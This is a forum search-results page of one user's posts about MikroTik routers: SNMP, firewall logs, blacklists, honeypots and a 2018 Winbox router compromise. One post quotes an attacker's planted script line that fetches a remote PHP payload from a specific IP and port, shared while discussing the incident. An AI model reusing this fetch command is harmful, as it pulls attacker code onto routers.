Search found 194 matches

by 43north
Tue Nov 20, 2018 10:33 pm
Forum: The Dude
Topic: Dude 6.41.2 lost SNMP interfaces
Replies: 16
Views: 1453

Re: Dude 6.41.2 lost SNMP interfaces

Just an update..... Switching to SNMP v2 fixed all my links in the newer Dude.
by 43north
Tue Nov 20, 2018 5:01 am
Forum: The Dude
Topic: Dude 6.41.2 lost SNMP interfaces
Replies: 16
Views: 1453

Re: Dude 6.41.2 lost SNMP interfaces

Migrated from an old Version 4.0beta3 to 6.42.9 and no SNMP interfaces anywhere. Tagging this to track for any updates.
by 43north
Fri Oct 19, 2018 4:37 pm
Forum: General
Topic: Weird interface graphing
Replies: 18
Views: 739

Re: Weird interface graphing

We replaced our 1016 almost two weeks ago with a brand new one. I forgot about this thread I had posted in and went and checked the graph on the interface that we had gaps on in the past. I have been watching the graph for about ten minutes now and there are no longer any gaps in the graph. We are s...
by 43north
Fri Sep 21, 2018 11:37 pm
Forum: General
Topic: Failed to pre-process ph2 packet.
Replies: 3
Views: 1022

Re: Failed to pre-process ph2 packet.

Did you find a solution to this? I am getting the exact same error in IPSEC log for one of my tunnel policies. Just started last week and no changes to the router that should have caused this. Only fix is to reboot the router and then it works. Flushed SAs and that did not help.
by 43north
Tue Sep 18, 2018 7:24 am
Forum: General
Topic: Weird interface graphing
Replies: 18
Views: 739

Re: Weird interface graphing

Following this lost, we have a 1016 on .26 firmware as well. Our graphs are mostly full on an interface but have some blank spaces in the graph even though it is the main trunk port with constant traffic. Let us know if your firmware upgrades help.
by 43north
Tue Sep 18, 2018 7:11 am
Forum: General
Topic: Stopping connections to TCP port 1720
Replies: 6
Views: 341

Re: Stopping connections to TCP port 1720

@mt99 I am glad you created this topic, I was doing the same thing a couple of weeks ago!!!! This makes sense now for me too, cable modem that can do phone as well. Ugh too funny
by 43north
Mon Sep 10, 2018 9:25 pm
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

I'm in a holding pattern while my lawyer researches the EU "GDPR" laws. It's looking like I will not be able to use 3rd party honeypots, as the GDPR requires companies to allow users to delete any data collected from there. That means that anyone with a honeypot running on their router will be able...
by 43north
Mon Sep 10, 2018 9:06 pm
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 275
Views: 38450

Re: Winbox vulnerability: please upgrade

May I ask, how is it possible for an attacker to load up the known scripts and modify firewall, sock proxy, etc. if in IP/Services only winbox and ssh are allowed, but they are limited to connect from known prefixes? It's even happened in 6.42.1 or 6.42.3 I have understood that even if you limit the conne...
by 43north
Mon Sep 10, 2018 4:58 am
Forum: General
Topic: Anyone use their "Drop All" input rule to make a black list of addresses?
Replies: 7
Views: 485

Re: Anyone use their "Drop All" input rule to make a black list of addresses?

As of today I have added port 10001 to my firewall also.. We have many people trying to scan for UBNT hardware! So my routers drop it by default now and log the IPs who are trying to use it.. Great write up and information, thanks for taking the time. Reference the 10001 and UBNT, I recently read a...
by 43north
Sun Sep 09, 2018 8:41 am
Forum: General
Topic: Anyone use their "Drop All" input rule to make a black list of addresses?
Replies: 7
Views: 485

Re: Anyone use their "Drop All" input rule to make a black list of addresses?

Hey guys thanks for the reply. I always like to see other people's firewall rules and thoughts. @samrock I see other people have these progress staged address lists. What is the thought behind that? Just to keep the ones that are knocking a lot in check for a longer period of time? I am currently ad...
by 43north
Sat Sep 08, 2018 8:08 am
Forum: General
Topic: Anyone use their "Drop All" input rule to make a black list of addresses?
Replies: 7
Views: 485

Anyone use their "Drop All" input rule to make a black list of addresses?

Just curious if anyone takes their Drop All input rule and makes an address "Block" list from the source addresses that hit the drop all rule? I have been tracking all my drop all rules by creating a test list. Just wonder if anyone incorporates these addresses into an actual block list? Pros or Con...
by 43north
Tue Aug 28, 2018 3:35 am
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

Dave,
Still very interested in learning how to setup a honeypot to collect addresses. Even if you are not to the point to accept other people's honeypot lists, could you do a brief write up to teach us the best way to setup a honeypot? Thanks!
by 43north
Sun Aug 19, 2018 8:27 pm
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

As you can tell, I've slowed down on development. Out of the 100+ people who filled out the notification form, more than 60% say they will not pay for this type of service. Only about 15 say they will pay for a commercial product. So, I'm going to take my time with it and try earning some income in ot...
by 43north
Wed Aug 15, 2018 7:43 am
Forum: General
Topic: Question on Firewall and blacklists
Replies: 4
Views: 282

Re: Question on Firewall and blacklists

Yes. The Input chain only affects traffic that will terminate on the router itself. The Forward chain affects traffic that will pass through the router. Note that you have an allow connected and related traffic in the Forward chain, that rule will allow responses to one of your users who connects t...
by 43north
Wed Aug 15, 2018 4:17 am
Forum: General
Topic: Question on Firewall and blacklists
Replies: 4
Views: 282

Question on Firewall and blacklists

So I have built a blacklist in my Tik. I have a filter rule on the INPUT chain to drop any traffic from SRC ADDRESS list BLOCK. That is all fine for anything in the block list that is coming in to the router. My confusion is that let's say address 185.168.4.4 is on the block list. Let's say this addre...
by 43north
Wed Aug 08, 2018 8:44 pm
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

on the flip side, if anyone is in Southern California (Rancho Cucamonga / Ontario / Pomona / San Bernardino) you are hit me up and I'd love to grab coffee and chat. Dave, although I am not in your area, I am next door in Idaho. I am very interested in setting up honeypots where I am at to contribut...
by 43north
Wed Aug 08, 2018 2:52 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 275
Views: 38450

Re: Winbox vulnerability: please upgrade

It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C as you also mentioned...
As I mentioned my file was empty as well, makes sense with what you guys are saying.
by 43north
Tue Aug 07, 2018 7:59 pm
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

Oh BTW guys, my Honeypots alone are reporting over 37,000 ACTIVE botnet IP's for the last 12 hours. Those IP's will NOT be included in the free list. Dave please don't limit the Beta, don't let this guy be the driver for that. It is not worth it and hurts us that are your loyal followers. I am usin...
by 43north
Tue Aug 07, 2018 7:24 am
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

currently, the priorities are pretty basic. #1 is a short list of about 2000, consisting of just the most common botnet attacks. If I end up offering a free tier, this will be it. #2 is a longer list of 30,000 to 40,000 IP's and subnets that includes #1, also adds most of the more common crap out t...
by 43north
Mon Aug 06, 2018 5:47 am
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

Just put the script on my home CCR1009 and am sooooo stoked to be using your service again. Just the peace of mind will be huge for me. Will move it into production on my work Tiks after testing a few days at home. EDIT: Also Dave can you educate us on the Priority Levels 1,2,3 that are part of the ...
by 43north
Sun Aug 05, 2018 8:37 pm
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 275
Views: 38450

Re: Winbox vulnerability: please upgrade

That's it! THX! In scripts are /tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now. Thanks I grabbed the PHP file before fixing my router. I opened it with notepad a...
by 43north
Sun Aug 05, 2018 10:09 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 275
Views: 38450

Re: Winbox vulnerability: please upgrade

Honestly I had never read the announcements section of the forum, I do now...... 43north ... please do not take it personally :-) but this is quotation of the month ... maybe even of the year. I don't take it personal at all. It is my fault for not being more in tune. I own it 100%. Super frustrati...
by 43north
Sun Aug 05, 2018 9:42 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 275
Views: 38450

Re: Winbox vulnerability: please upgrade

43north ... you are using our forum ... you are posting ... why have you not upgraded your router earlier even you have had (I suppose) knowledge of the problem? Honestly I had never read the announcements section of the forum, I do now...... and will from here on out. My ignorance cost me, I know....
by 43north
Sun Aug 05, 2018 9:00 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 275
Views: 38450

Re: Winbox vulnerability: please upgrade

@normis we were hit with this on July 22nd. I was on a vulnerable firmware and the only service we had open was winbox but with no filtering and on the default port :(. I caught it in less than 24 hours because of the log file. I had a backup config from a few days prior to the attack which I restor...
by 43north
Thu Aug 02, 2018 8:02 am
Forum: Scripting
Topic: Blacklist Filter (Development Topic)
Replies: 151
Views: 9641

Re: Blacklist Filter (Development Topic)

I am looking forward to it and will definitely be a paying customer!!!!
by 43north
Wed Jul 11, 2018 9:53 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

Quick update..... So I ran a traceroute on my Mikrotik to a number of different sites. Take a look..... the offending 192.168.62.185 address is number three on every traceroute. This has to be part of my cable company internet stack. I am just trying to figure out if it is a problem on their end or ...
by 43north
Sat Jul 07, 2018 3:29 am
Forum: General
Topic: Anyone using Ubiquiti branded SFP transceivers in your Mikrotik routers?
Replies: 4
Views: 382

Anyone using Ubiquiti branded SFP transceivers in your Mikrotik routers?

Title says it all. I have a Mikrotik CCR1016 and all Ubiquiti Edgeswitches on my network. Wondering if any of you are using the Ubiquiti branded fiber transceivers in your Mikrotik routers and if they are playing well with it?
by 43north
Tue Jul 03, 2018 4:46 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

Do you have VMPlayer, WMWorkstation, VirtualBox etc. installed on any computer in your LAN? These programs create virtual interfaces and assign them "local networks pools" addresses and offer bridging with real interface so you can see packets originating from these virtual interfaces leaking to you...
by 43north
Mon Jul 02, 2018 5:45 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

Don't give up yet @CZFan and @R1CH
by 43north
Fri Jun 29, 2018 10:24 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

I would then guess the next step is for a diagram of the network and current config of your router One more thought..... We have a static IP from our cable company for internet. Cable modem plugs into router WAN port and is configured for that static address. I went and plugged my laptop directly i...
by 43north
Fri Jun 29, 2018 9:42 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

Is it in IP Routes? No not at all, craziest thing! I have seen it happen on four of our machines on our 10 subnet, three of them in the same building on the same VLAN and the other in a different building on a different VLAN. Same 192 address and MAC every time. Always to Microsoft addresses. So we...
by 43north
Fri Jun 29, 2018 9:27 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

What is 192.168.62.185? I suspect it is the gateway for the device you posted the logs for? You can see from the log screenshot posted traffic is coming from a Public IP, but your gateway is reporting this No I can not find this address anywhere on my network, I only use 10 subnet, I do use 192 sub...
by 43north
Fri Jun 29, 2018 4:54 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

Any thoughts @R1CH?
by 43north
Thu Jun 28, 2018 6:27 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

That's correct, it's caused by a non-translated packet exiting from a remote NAT and making it across the internet with an invalid source IP. They're quite rare, but if you run a busy enough network / website you'll see quite a lot of them. Some stats from one of my websites which filter these on I...
by 43north
Thu Jun 28, 2018 5:33 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

This is caused by a combination of bad ISPs that don't do BCP38 and bad routers that don't NAT properly. An outbound packet from your network goes across the internet to some host behind a poor quality NAT router. The host PC / network responds with an ICMP error (TTL exceeded, port unreachable or ...
by 43north
Thu Jun 28, 2018 5:05 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

It means TTL reached 0 during transit, look for routing loops, etc
Where would I start to look for routing loops? I don't have anything in log files that would indicate routing loop. Is there certain log files I can turn on to show this?
by 43north
Thu Jun 28, 2018 4:35 pm
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Re: Why am I getting this firewall entry???

Maybe someone from staff has a second fixed IP address set? The source mac is rather strange, as it belongs to ARRIS Group which is a cable modem manufacturer. Maybe they have some auto-aliased internal IP in place. OK well that makes sense for the source MAC and I should have looked that MAC up to...
by 43north
Thu Jun 28, 2018 8:08 am
Forum: General
Topic: Why am I getting this firewall entry???
Replies: 22
Views: 1077

Why am I getting this firewall entry???

So.... All my staff traffic is on 10 subnet, all guest traffic on 192 subnet. So I am getting these occasional firewall logs for address 192.168.62.185. This is not even in my DHCP pool, ARP, or anywhere that I can find on my network. The machines on the 10 subnet in the photo are in the same office ...
by 43north
Tue Jun 26, 2018 5:00 pm
Forum: General
Topic: When WAN connection fails over to backup connection, get these log errors. [SOLVED]
Replies: 5
Views: 244

Re: When WAN connection fails over to backup connection, get these log errors. [SOLVED]

Ahhhhhh okay so I use a Cradlepoint with IP passthrough for the secondary WAN, I just looked at the MTU for the LTE on the cradlepoint is 1428 and on my mikrotik for that interface it was still on the default 1500. Would that possibly cause the issues I am seeing as well as the intermittent internet...
by 43north
Tue Jun 26, 2018 10:07 am
Forum: General
Topic: When WAN connection fails over to backup connection, get these log errors. [SOLVED]
Replies: 5
Views: 244

Re: When WAN connection fails over to backup connection, get these log errors. [SOLVED]

So why is it doing this for secondary WAN but not for primary WAN?
by 43north
Tue Jun 26, 2018 9:07 am
Forum: General
Topic: When WAN connection fails over to backup connection, get these log errors. [SOLVED]
Replies: 5
Views: 244

When WAN connection fails over to backup connection, get these log errors. [SOLVED]

Very strange, have two WAN connections. Nothing fancy just a primary one and then a cellular modem as a backup if the primary goes down. Whenever it switches to the backup my log gets flooded with these firewall hits. Why is that? Also the connection has problems when on the backup. I have a separate...
by 43north
Sun Apr 01, 2018 3:32 am
Forum: Announcements
Topic: v6.41.3 [current]
Replies: 139
Views: 22772

Re: v6.41.3 [current]

Can someone confirm for me specifically with the DHCP issue on a bridge only occurs if you have the DHCP server on an individual physical interface that is part of a bridge? I have my DHCP assigned directly to the bridge itself, will I have issues with it setup this way or is that the way it is work...
by 43north
Wed Jan 10, 2018 7:00 am
Forum: General
Topic: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch
Replies: 34
Views: 10723

Re: VLAN Trunk Between Mikrotik CCR and Ubiquiti EdgeSwitch

Send me an email, it is listed above.
by 43north
Thu Dec 14, 2017 11:25 pm
Forum: RouterOS v6 RC and v7 BETA
Topic: router was rebooted without proper shutdown, probably kernel failure
Replies: 27
Views: 5790

Re: router was rebooted without proper shutdown, probably kernel failure

Yeah I was already on 6.40.5 but what I hadn't done is upgraded the actual routerboard firmware itself. I upgraded that as well yesterday. I have only had a single crash yesterday morning so keeping an eye on things.
by 43north
Wed Dec 13, 2017 9:25 pm
Forum: RouterOS v6 RC and v7 BETA
Topic: router was rebooted without proper shutdown, probably kernel failure
Replies: 27
Views: 5790

Re: router was rebooted without proper shutdown, probably kernel failure

Any update on this? I experienced a similar crash this morning on our main CCR1016. I sent the supout file to Mikrotik but any updates on what happened?
by 43north
Tue Dec 05, 2017 8:44 am
Forum: General
Topic: Why is ping now blocked by my firewall rule for drop invalid packets?
Replies: 7
Views: 604

Re: Why is ping now blocked by my firewall rule for drop invalid packets?

The ICMP rule is there, but it is below the invalid drop rule. Now it has always been below and never been an issue. Just for kicks I moved it to the top of the list and it still didn't matter, ping won't go through unless I disable the drop invalid rule. Super weird....
by 43north
Tue Dec 05, 2017 6:12 am
Forum: General
Topic: Why is ping now blocked by my firewall rule for drop invalid packets?
Replies: 7
Views: 604

Why is ping now blocked by my firewall rule for drop invalid packets?

So I have had the same setup for quite a while, nothing has changed other than new firmware..... Two routers in OSPF config. When I try and ping from my desktop computer to network switches on the other router it just times out. But on that router if I just disable my drop invalid packets rule, the ...